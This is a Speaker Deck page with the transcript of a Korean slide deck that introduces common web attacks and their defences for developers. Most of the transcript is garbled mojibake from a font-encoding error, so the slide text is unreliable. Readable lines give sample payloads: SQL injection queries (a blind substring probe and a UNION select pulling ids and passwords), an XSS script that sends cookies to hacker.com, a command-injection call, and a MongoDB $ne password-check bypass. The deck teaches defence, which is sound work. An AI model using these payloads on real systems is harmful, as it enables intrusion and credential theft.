Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
웹 개발을 위해 꼭 알아야하는 보안 공격
Search
Lee Sun-Hyoup
February 22, 2021
Programming
0
22
웹 개발을 위해 꼭 알아야하는 보안 공격
통신보안
Lee Sun-Hyoup
February 22, 2021
Tweet
Share
More Decks by Lee Sun-Hyoup
See All by Lee Sun-Hyoup
Kotlin Script 활용하기
kciter
0
250
MongoDB 이해하기
kciter
0
620
Other Decks in Programming
See All in Programming
React + TextAliveでカッコいいLyric Applicatioinを作ろう!!
tosuri13
0
400
Scala におけるコンパイラエラーとの付き合い方
chencmd
2
430
Ruby Parser progress report 2024
yui_knk
2
230
Desafios e Lições Aprendidas na Migração de Monólitos para Microsserviços em Java
jessilyneh
2
150
The Sequel to a Dream of Ruby Parser's Grammar
ydah
1
220
いつか使える ObjectSpace / Maybe useful ObjectSpace
euglena1215
2
140
Go1.23で入った errorsパッケージの小さなアプデ
kuro_kurorrr
2
400
Regular Expressions, REXML, Automata Learning
makenowjust
0
220
なぜアジャイルがうまくいかないのか?
yum3
1
110
Patched fetch did not work
quramy
4
410
GraphQLとGigaViewer for Apps
numeroanddev
2
190
Ebitengineの1vs1ゲーム WebRTCの活用
ponyo877
0
380
Featured
See All Featured
A better future with KSS
kneath
235
17k
ReactJS: Keep Simple. Everything can be a component!
pedronauck
663
120k
Product Roadmaps are Hard
iamctodd
PRO
48
10k
Java REST API Framework Comparison - PWX 2021
mraible
PRO
27
7.4k
The Brand Is Dead. Long Live the Brand.
mthomps
53
38k
I Don’t Have Time: Getting Over the Fear to Launch Your Podcast
jcasabona
26
1.9k
Stop Working from a Prison Cell
hatefulcrawdad
267
20k
Distributed Sagas: A Protocol for Coordinating Microservices
caitiem20
326
21k
WebSockets: Embracing the real-time Web
robhawkes
59
7.3k
Git: the NoSQL Database
bkeepers
PRO
425
64k
XXLCSS - How to scale CSS and keep your sanity
sugarenia
246
1.3M
RailsConf 2023
tenderlove
28
820
Transcript
ਢѐߊਸਤ೧ ԙঌইঠೞחࠁউҕѺ 2021. 02. 22 ࢶഈ
য়טݾ ਢࠁউী೧೧ೞҊӝୡҕѺӝߨҗ೧Ѿߑߨਸ೧ೠ
ਢࠁউ ਢࢎஂডਸҕѺೞחӝࣿਤഈਵ۽ ਢಕܳాೞৈ ӂೠহחदझమীӔೞѢաؘఠਬ߂Ҧ৬э೯ਤ݈ܳೠ https://ko.wikipedia.org/wiki/ਢ_೧ఊ
None
ೠࣽрपࣻ۽ࢲ࠺झоݎೡࣻب😨
ցޖনೠҕѺӝߨj 42-*OKFDUJPO 944 $43'"UUBDL 'JMF6QMPBE"UUBDL $PNNBOE*OKFDUJPO #VGGFS0WFSGMPX %JDUJPOBSZ"UUBDL
ࠗחইפ؊ۄبӝୡੋѪ ԙঌইىঠೠ
ঌইঠೞחҕѺӝߨ 4UBSU
42-*OKFDUJPO ↟ࢲߡীࢲप೯غח42-ਸঈਵ۽ਊೞחҕѺ ↟ӝઓ42-ীঈੋ42-ਸੑೠ ↟ؘఠఎஂ ઁ١оמೞ ↟ڦܻݶࢲ࠺झઙܐп
42-*OKFDUJPOࢎ۹
42-*OKFDUJPOࢎ۹
42-*OKFDUJPOߑয ↟42-ীࢲౠ߹ೠܳоחޙܳझாೠ FY =O =U ] j
↟ળ࠺ػࢶਸࢎਊೠ ↟ਃ્ۄ࠳۞ܻ ۨਕীࢲইੜ݄ইળ
42-*OKFDUJPOबച ↟&SSPSCBTFE42-*OKFDUJPO ↟ੌࠗ۞42-ী۞ܳߊࢤदெਗೞחࠁܳஂٙೠ ↟௪ܻޙ୶ஏ %#ݺ ప࠶ݺ١ஂٙоמೞ
42-*OKFDUJPOबച ↟#MJOE42-*OKFDUJPO ↟2VFSZѾҗଵѢਸࠁҊਗೞחࠁо ઓೞחঌࣻ ୶ۿ ↟%# 5BCMFݺਸঌࣻ ↟42-.BQ ex)
SELECT * FROM users WHERE user_id = '1' and substring(database(),1,2)='us'#
42-*OKFDUJPOबച ↟6OJPO42-*OKFDUJPO ↟6OJPOݺ۸ਸਊೞৈࠁܳஂٙೠ ex) SELECT * FROM users WHERE user_id
= '1' or 1=1 UNION SELECT '',id,pw from users#
944 ↟$SPTF4JUF4DSJQUJOH ↟ਢಕীঈࢿझ݀ܳੑೞחҕѺ ↟ࢎਊࠁܳఎஂೡࣻ ↟ڦܻݶ݆Ѫਸח
944ࢎ۹ <script>document.URL='http://hacker.com?'+document.cookie</script> ѱद౸ ਊо Ӗਸ ੍ਸ ٸ ష ఎஂ!!!
944ߑয ↟)5.-ఠ݂ਸೠറ%#ীೠ FY TDSJQU IUNM IFBE NFUB jj
↟݅ডਸਤ೧ۿূ٘ীࢲبఠ݂ೠ
944बച ↟খࢲࣗѐೠߑध4UPSFE944 ↟3FGMFDUFE944 ↟%0.#BTFE944
944बച ↟3FGMFDUFE944 ↟Ѩ࢝য١ਸࠁৈחҔীझ݀ܳबחҕѺ ↟63-ਸࢎਊীѱ־ܰѱٜ݅ݶҕѺࢿҕ https://papago.naver.com/?sk=ko&tk=en&st=<script>…</script>
944बച ↟%0.#BTFE944 ↟%0.ীঈੋझ݀ܳबחҕѺ ↟࠳ۄо೧ࢳೞחױ҅ীࢲߊࢤغחҕѺ
$43'"UUBDL ↟$SPTT4JUF3FRVFTU'PSHFSZ ↟ҕѺоࢎਊܳਊೞৈਢࢎী ਃਸࠁղחҕѺ
$43'"UUBDLࢎ۹ о admin 1q2w3e4r ۽Ӓੋ ਃ ࢿҕ/पಁ ࢿҕ೮ਵݶ
$43'"UUBDLߑয ↟3FGFSSFS$IFDL ↟ೲਊೠبݫੋ݅ਃೲۅೞب۾ࢸ ↟$43'5PLFO ↟ݽٚਃীషਸߊәೞৈࢲߡীࢲѨૐ ↟$"15$)" ↟ࢎۈਃೠѪݏחѨૐ
$PNNBOE*OKFDUJPO ↟গܻா࣌ীࢲࢎਊغחदझమݺ۸ীঈੋ ݺ۸যܳੑೞחҕѺ 8FC4IFMM"UUBDL ↟ࢲߡSPPUӂೠਸஂٙೡࣻ ↟ڦܻݶࢲ࠺झઙܐп
$PNNBOE*OKFDUJPOࢎ۹ )BDLFS UFYUUYUJGDPOGJH system("cat ${var}") FYFDVUF 8FC4IFMM
$PNNBOE*OKFDUJPOߑয ↟оәदझమೣࣻחࢎਊ9 ↟хೠޙܳఠ݂ FY ]
'JMF6QMPBE"UUBDL ↟ঈࢿझ݀ੌਸস۽٘ೞחҕѺ ↟স۽٘റੌਤܳইप೯दఃݶҕѺࢿҕ ↟ڦܻݶࢲ࠺झઙܐп
'JMF6QMPBE"UUBDLࢎ۹ Upload 1 2 Command WebShell
'JMF6QMPBE"UUBDLߑয ↟ഛੌఋੑѨࢎ ↟স۽٘ੌਸդࣻചೞৈ ↟ౠࣻޙоನೣػ҃স۽٘Ә (Null byte Injection ߑয)
+BWBTDSJQU*OKFDUJPO ↟$MJFOU4JEFীࢲ+BWBTDSJQUܳੑदఃחҕѺ ↟܁DPOTPMF١ਸా೧ઑоמೞ ↟$MJFOU4JEFীхೠؘఠܳ֍ਸ҃ఎஂоמ
+BWBTDSJQU*OKFDUJPOࢎ۹
+BWBTDSJQU*OKFDUJPOߑয ↟$MJFOU4JEFূхೠࠁܳ֍ঋח ↟ؘఠਬബࢿѨࢎоਃೠ҃ࢲߡ৬ాनೠ $MJFOUীࢲѨࢎೞݶউػ
%%P4 ↟%JTUSJCVUFE%FOJBMPG4FSWJDF ↟ࢲߡী࠺࢚ਵ۽݆ېਸࠁղחҕѺ ↟ࢲ࠺झо݃࠺غҊ݆࠺ਊࣗݽػ
%%P4ࢎ۹ Zombie PC Traffic
%%P4ߑয ↟ઁੌױࣽೠؘઁੌ݄ӝয۵ ↟ഛоמೠࢲ࠺झҳઑࢸ҅ ↟*1ఠ݂ ↟ࣛܖ࣌ҳݒj
%JDUJPOBSZ"UUBDL ↟ܻࢎী١۾೧֬ޙৌਸঐഐ۽ੑೞחҕѺ ↟#SVUF'PSDFੌઙ
%JDUJPOBSZ"UUBDLࢎ۹ admin apple banana cyber . . . 1q2w3e4r
%JDUJPOBSZ"UUBDLߑয ↟оחޙৌঐഐ۽١۾ޅೞب۾ࢸ ↟"DDPVOU-PDLPVU1PMJDZ ↟GBDUPSੋૐ
3BJOCPX5BCMF ↟೧दೣࣻܳਊೠಣޙਸݽفदெ֬ ↟҅ఎஂറঐഐਗޙਸঌইղӝਤ೧ࢎਊ
3BJOCPX5BCMFߑয ↟4BMUࢎਊ ↟,FZ4USFUDIJOH ↟1#,%' #DSZQU١ঐഐചঌҊ્ܻࢎਊ
.POHP%#*OKFDUJPO ↟42-*OKFDUJPOۢঈੋчਸ֍য %#ܳઑೞחҕѺ ↟ڦܻݶࢲ࠺झઙܐп
.POHP%#*OKFDUJPOࢎ۹ db.collection.find({ "email": "
[email protected]
", "password": password }) db.collection.find({ "email": "
[email protected]
",
"password": { "$ne": "-" }) password = { "$ne": "-" }
.POHP%#*OKFDUJPOߑয ↟ೱਸࣻחޙܳఠ݂ೠ FY \ ^ < >
#VGGFS0WFSGMPX ↟#VGGFS0WFSGMPXܳా೧ܲݫݽܻীӔೞחҕѺ ↟ܲݫݽܻীӔ߂ઁযооמೞӝٸޙীݺ ↟दझమ೧ఊӝߨӝبೞ ↟ڦܻݶࢲ࠺झઙܐп
None